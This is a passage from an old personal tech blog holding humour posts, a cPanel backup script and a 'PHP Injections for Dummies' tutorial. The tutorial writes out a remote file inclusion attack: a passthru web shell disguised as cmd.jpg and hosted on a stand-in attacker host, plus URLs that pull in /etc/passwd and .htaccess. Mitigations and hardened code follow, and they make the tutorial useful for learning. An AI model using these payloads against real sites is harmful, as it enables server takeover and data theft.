Tux too Sexy for My Desktop

Posted by Nessa | Posted in Uncategorized | Posted on 10-01-2007


Stewie Griffin is the only thing sexier than the Linux Penguin. I’m almost too scared to post this gallery because I don’t want to be arrested for child porn.

(gallery: Tux Toilet, Knopicilin, Tux Box)

cPanel Automated Backup Script

Posted by Nessa | Posted in Uncategorized | Posted on 03-01-2007


This is a simple script derived from the cPanel process that generates full account backups, only in PHP form. It makes backing up your site easier and more reliable by letting you generate and keep your own full site backups on a schedule instead of relying on your host.

Download v1.6

  • Automatic backup via Cron job
  • Generates an actual cPanel backup in tar.gz format
  • Very easy to set up, and executable with only one simple command
  • Email notification when the backup is complete
  • FTP option to transfer the backup file to a specified FTP server
  • Compatible with monsoon, x, x2, and x3 themes

Requirements:

  • cPanel 10 or higher with Cron job and backup functionality enabled
  • PHP 4.1.x or higher
  • FTP access (optional)

How to Use:

  1. Download the script to your computer and extract the tarball
  2. Edit the cpanel_backup.php file with your cPanel settings:

$cpuser = Your cPanel username

$cppass = Your cPanel password

$domain = The domain name where cPanel is run, usually without the www

$skin = The cPanel skin (theme) you are currently running. This will usually be "x3" if you're on cPanel 11 and "x" if you're still on 10 (which I hope you're not), but your webhost may have changed this. You can double-check by logging into cPanel and viewing your server settings, or by looking at the /frontend/<skin>/ part of the URL once you're logged in:

(screenshot: cPanel server settings page, showing the theme in use)

The next section will set up the FTP options to upload the backup tarball to a server. If the FTP location is the same as the server you are doing the backup on, you should leave these fields blank.

$ftpuser = Username for your FTP site

$ftppass = Password for your FTP site

$ftphost = FTP hostname (usually ftp.yourdomainname.com)

$ftpmode = The mode in which you would like the file transferred, "active" or "passive". I would recommend "passive" mode, especially for larger sites; it also works better when the backup server sits behind a firewall or NAT.

$notifyemail = The email address the backup confirmation should be sent to once the backup is complete

$secure = Whether the script should talk to cPanel over its SSL port (2083) instead of the plain port (2082). Turn it on if your host supports it; otherwise your cPanel password crosses the network in the clear.

$debug = Whether or not to show the detailed backup results in your confirmation email

3. Once the PHP file has been configured, upload it to your web server. For security's sake, it is very important that this file lives outside your document root (public_html) with permissions of 600: it contains your cPanel password (and your FTP password) in cleartext, so anyone who can read it owns the account. With the file outside the document root, a misconfigured server that stops executing PHP can't serve it as plain text either.

4. Now, all you need to do is set the crontab. Log into your cPanel and go to the "Cron Jobs" section and choose "Standard." Here is where you will create the actual cron job to run the script whenever you want:

(screenshot: cPanel cron job form)

The command may vary depending on the setup of PHP on your server, but your Cron command will be as follows:

php -q /home/username/cpanel_backup.php
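To make the moving parts concrete, here is an added example of the core of such a script. It is written for this page and is not the v1.6 download. It assumes that cPanel's full-backup handler lives at /frontend/<skin>/backup/dofullbackup.html and takes the form fields dest, server, user, pass, port, rdir and email (taken from the x3 backup form; check them against your own cPanel version), that plain cPanel is on port 2082 and SSL on 2083, and all credentials and hostnames are placeholders. It refuses to run while its own file is group- or world-readable, which is the mode-600 rule above, and defaults to a dry run that prints the request with the secrets redacted instead of sending it:

```php
<?php
// Added example, not the v1.6 script from the post. The handler path and the
// field names below are assumed from the cPanel x3 backup form; 2082/2083 are
// cPanel's plain/SSL ports. Every credential here is a placeholder.

$cpuser      = 'username';
$cppass      = 'cpanel-password';
$domain      = 'example.com';
$skin        = 'x3';
$ftpuser     = 'ftpuser';        // leave '' to keep the backup in the home directory
$ftppass     = 'ftp-password';
$ftphost     = 'ftp.example.com';
$ftpmode     = 'passive';        // 'passive' or 'active'
$notifyemail = 'admin@example.com';
$secure      = true;             // true: TLS on 2083, false: plain on 2082
$dryrun      = true;             // print the request (secrets redacted) instead of sending it

// This file holds two passwords in cleartext, so refuse to run unless only
// the owner can read it (the mode-600 rule from the post).
function config_is_private(string $file): bool
{
    return (fileperms($file) & 0077) === 0;
}

// Build the full-backup POST as a raw HTTP/1.0 message with Basic auth.
function build_backup_request(array $c): string
{
    if ($c['ftpuser'] === '') {
        $params = ['dest' => 'homedir'];
    } else {
        $params = [
            'dest'   => $c['ftpmode'] === 'passive' ? 'passiveftp' : 'ftp',
            'server' => $c['ftphost'],
            'user'   => $c['ftpuser'],
            'pass'   => $c['ftppass'],
            'port'   => 21,
            'rdir'   => '/',
        ];
    }
    $params['email'] = $c['notifyemail'];
    $body = http_build_query($params);              // URL-encodes each value
    $auth = base64_encode($c['cpuser'] . ':' . $c['cppass']);

    return "POST /frontend/{$c['skin']}/backup/dofullbackup.html HTTP/1.0\r\n"
         . "Host: {$c['domain']}\r\n"
         . "Authorization: Basic {$auth}\r\n"
         . "Content-Type: application/x-www-form-urlencoded\r\n"
         . "Content-Length: " . strlen($body) . "\r\n"
         . "Connection: close\r\n\r\n"
         . $body;
}

// Send over plain TCP or TLS depending on $secure; returns the raw response.
function send_request(string $domain, bool $secure, string $request): string
{
    $target = ($secure ? 'ssl://' : '') . $domain;
    $port   = $secure ? 2083 : 2082;
    $sock   = fsockopen($target, $port, $errno, $errstr, 30);
    if ($sock === false) {
        throw new RuntimeException("connect to $target:$port failed: $errstr ($errno)");
    }
    fwrite($sock, $request);
    $response = stream_get_contents($sock);
    fclose($sock);
    return $response;
}

// Strip the credentials before anything gets printed or mailed.
function redact(string $request): string
{
    $r = preg_replace('/^(Authorization: Basic )[^\r\n]*/m', '$1[redacted]', $request);
    return preg_replace('/(pass=)[^&]*/', '$1[redacted]', $r);
}

if (!config_is_private(__FILE__)) {
    fwrite(STDERR, __FILE__ . " is readable by others; chmod 600 it and retry\n");
    exit(1);
}

$request = build_backup_request(compact(
    'cpuser', 'cppass', 'domain', 'skin', 'ftpuser', 'ftppass', 'ftphost', 'ftpmode', 'notifyemail'
));
if ($dryrun) {
    echo redact($request), "\n";
} else {
    echo send_request($domain, $secure, $request);
}
```

Run it the same way the cron line does (php -q /home/username/cpanel_backup.php), look at the printed request, and only then set $dryrun to false. The permission check is deliberately the first thing that happens: a copy of this file left at 644 fails before it ever builds a request containing your passwords.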

Known issues:

  • Users having the rvskin theme have indicated that using 'x3' as the theme may work, but others have said that the script just doesn't work at all. I'd say just try running a backup manually, see what theme appears in your URL when you do it, and use that.

Upcoming Features:

  • Support for SSH/scp
  • Selection of remote directory for FTP and SSH/scp
  • Option to just back up MySQL databases or home directory

The Linux Penguin is Sexy

Posted by Nessa | Posted in Uncategorized | Posted on 01-01-2007


Ya know, I've never noticed how friggin sexy the Linux penguin is. I mean those flippers and that long, hard beak?... so hot.

Here are some more pictures of the Linux Penguin being sexy:

Sexy Linux Penguin Gallery

PHP Injections for Dummies

Posted by Nessa | Posted in Uncategorized | Posted on 30-12-2006


This is a basic tutorial on how to do a simple PHP injection, for all you n00bish script kiddies

UPDATE: FYI, since PHP 5.2.0 this post mainly applies to earlier versions, because remote includes are disabled in all later releases unless specifically allowed in php.ini (the allow_url_include directive).

So basically, a PHP injection (more precisely, a file inclusion attack) is a way of slipping your code in with someone else's, while making the server think it is legit. Take a common PHP-formatted URL:

http://v-nessa.net/index.php?page=mypage.php

You need to understand what this URL is doing. It calls the index.php page, and the ? tells the server that a query string follows, in this case a page specification of mypage.php. The include itself happens in index.php: the script takes the page parameter and pulls the contents of that file into index.php. Here's what my index.php file looks like:

<?php
include('header.php');
include($page); // this is the page we are calling in the URL ($page is filled in from ?page= by register_globals)
?>

Now, the index.php?page= syntax is the worst case scenario: it will allow you to include the contents of any page into index.php. Do you get where I'm going with this?

An easy example and test is to take your vulnerable page and append an extra URL to it, for example, google.com. So my URL will look like this:

http://v-nessa.net/index.php?page=http://google.com

If you see Google show up anywhere on the page, then congratulations, you found a leak in the code. Now, knowing that you can name any file in the URL and have it posted in index.php (a file with no PHP tags in it is simply echoed back), I'm sure your mind is wandering with possibilities. Why don't we try the .htaccess?

http://v-nessa.net/index.php?page=.htaccess

Or if you're feeling daring you could probably even grab the passwd file on the server:

http://v-nessa.net/index.php?page=/etc/passwd

But don't get your hopes up on that one: most servers set PHP's open_basedir restriction to keep PHP from reading anywhere it shouldn't go.

Now that we know the basics, let's have some fun!

Using something like Notepad, create a text file, save it as cmd.jpg in ANSI (plain ASCII) encoding, and upload it to a server you control. The .jpg extension matters: your own web server then hands the file out as plain data instead of running it, while the victim's include() executes whatever it fetches. The file contains:

<?php passthru($cmd); ?>

Now go back to the vulnerable page, but add your file’s URL to the end:

http://v-nessa.net/index.php?page=http://hackersite.com/cmd.jpg

Now you can append commands to the end of the URL to run Linux commands in the browser; they run as the web server's user. Yes, Linux commands, meaning you now have free rein over the user's directories, especially ones that are stupidly set to 666 or 777. You can pretty much do anything, like create files/folders, write scripts, download more files, and maybe even delete a few. Here's the syntax (note the & rather than a second ?: cmd has to be a parameter of the victim's request so that register_globals there sets $cmd, and spaces must be URL-encoded as %20):

http://v-nessa.net/index.php?page=http://hackersite.com/cmd.jpg&cmd=mkdir%20weeeeeeee

*sigh* Now I have to tell you how to prevent this. In a nutshell:

1. Install mod_security into Apache and make sure your rulesets accommodate the PHP software you have installed, including rules for sensitive files like .htaccess and .htpasswd. This means when those files are named in a request, the server denies it.

2. Turn register_globals off for PHP. It shouldn't be on anyway. Note that this only removes the magic $page variable; a script that does include($_GET['page']) is just as exposed, so the code fixes below still apply.

3. Don't hand the request value to include() at all. A file_exists() check, which makes sure that any included file exists locally, stops remote URLs but not local paths like /etc/passwd; better is to map the page parameter onto a fixed list of allowed filenames and ignore anything not on the list.

4. Turn off allow_url_fopen in php.ini (or the Apache config; it is a system-level directive, so it can't be changed from .htaccess), but beware, because some software requires this to work.

UPDATE: Since PHP 5.2.0, remote includes are no longer enabled without the php.ini directive allow_url_include.

5. Make sure open_basedir is set for PHP (in php.ini, or per virtual host in the Apache config) so PHP can't access files outside the user directory.

6. And the big DUH! Keep your software up to date and refrain from making any folders or files on your site writable by the "everyone else" group without taking the proper measures to protect them.
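The vulnerable index.php above next to two hardened versions, as an added example that is not code from the original post: an allowlist that maps the page parameter onto fixed filenames, and a directory-confinement check for code that must keep accepting filenames (the proper form of the file_exists() idea). The page names, the temporary pages/ directory and the attack strings are all constructed for the demo, and it assumes PHP 7.1 or later:

```php
<?php
// Added example; not code from the original post. Creates its own page
// directory under the system temp dir so it runs stand-alone:
//   php include_hardening.php
// Requires PHP 7.1+ (nullable return types, ??).

// VULNERABLE (do not use): request data chooses what gets executed. With
// register_globals on, $page comes straight from ?page=; with allow_url_fopen
// and allow_url_include on, an http:// value is fetched and run.
function vulnerable_include(string $page): void
{
    include $page;
}

// HARDENED, preferred: the request supplies a key, never a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): string
{
    // Unknown keys (including any URL or path) fall back to a known page.
    return PAGES[$requested] ?? PAGES['home'];
}

// HARDENED, for code that must keep taking filenames: resolve the real path
// and require it to stay under $baseDir. Returns null on any escape or
// missing file, so the caller can 404 instead of including.
function confine_to_dir(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ and symlinks and returns false for anything that
    // does not exist, which covers http:// URLs as well as names like .htaccess.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;   // resolved to somewhere outside the page directory
    }
    return $candidate;
}

// --- demo with a constructed page directory ---
$dir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($dir, 0700);
foreach (PAGES as $file) {
    file_put_contents("$dir/$file", "<?php echo 'rendered $file';\n");
}

// Constructed inputs, the same shapes the post uses.
$attempts = [
    'home',
    'about.php',
    'http://hackersite.com/cmd.jpg',
    '../../../../etc/passwd',
    '.htaccess',
];
foreach ($attempts as $a) {
    $confined = confine_to_dir($a, $dir);
    printf("%-32s allowlist -> %-12s confine -> %s\n",
        $a, resolve_page($a), $confined === null ? 'rejected' : basename($confined));
}

// Safe to include: the path came from the map, not from the request.
include $dir . '/' . resolve_page($_GET['page'] ?? 'home');
echo "\n";

array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

With the allowlist, every attack string collapses to home.php because it is not a key in the map; with the confinement check, the traversal attempt resolves to /etc/passwd and is rejected by the prefix test, and the URL and .htaccess strings are rejected because realpath() cannot find them under the page directory. The allowlist is the one to prefer: it never lets the request touch the filesystem at all.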

Hottest Hacker on Earth

Posted by Nessa | Posted in Uncategorized | Posted on 28-12-2006


Just when we all thought the world couldn't get any worse, it seems that Google, O'Reilly, and Wired Magazine got together to name David Hansson (the creator of Rails) the Hottest Hacker on Earth. It's like they just decided to come up with a new award that no one's ever heard of. What now? Is this kid going to get a scholarship to Harvard? Is he going to land a gig with a top technology firm? Hardly. You'll most likely find him sitting on his couch wearing a wifebeater and chucking mustard at the TV. He is kind of cute though, but I could never marry a guy whose middle name sounds like a penis metaphor.